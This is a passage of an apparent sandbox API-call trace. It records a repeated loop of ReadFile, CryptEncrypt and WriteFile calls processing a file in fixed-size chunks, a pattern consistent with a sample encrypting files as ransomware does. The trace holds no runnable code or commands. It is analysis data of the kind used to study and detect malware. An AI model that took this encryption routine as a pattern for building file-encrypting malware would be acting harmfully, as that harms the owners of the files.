hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.793] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.793] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.793] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.793] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.793] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.793] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.793] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.793] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.793] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.794] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.794] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.794] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.794] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.794] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.794] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.794] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.794] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.794] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.794] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.794] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.795] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.795] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.795] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.795] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.795] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.795] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.795] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.795] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.795] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.796] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.796] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.796] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.796] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.796] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.796] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.796] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.796] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.796] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.796] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.797] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.797] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.797] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.797] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.797] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.797] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.797] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.797] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.797] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.797] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.798] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.798] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.798] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.798] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.798] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.798] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.798] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.798] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.798] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.798] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.799] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.799] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.799] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.799] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.799] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.799] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.800] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.800] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.800] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.800] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.800] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.800] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.800] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.800] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.800] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.800] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.801] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.801] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.801] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.801] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.801] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.801] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.801] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.801] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.801] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.801] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.801] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.802] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.802] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.802] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.802] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.802] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.802] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.802] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.802] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.802] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.802] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.802] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.803] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.803] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.803] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.803] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.803] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, 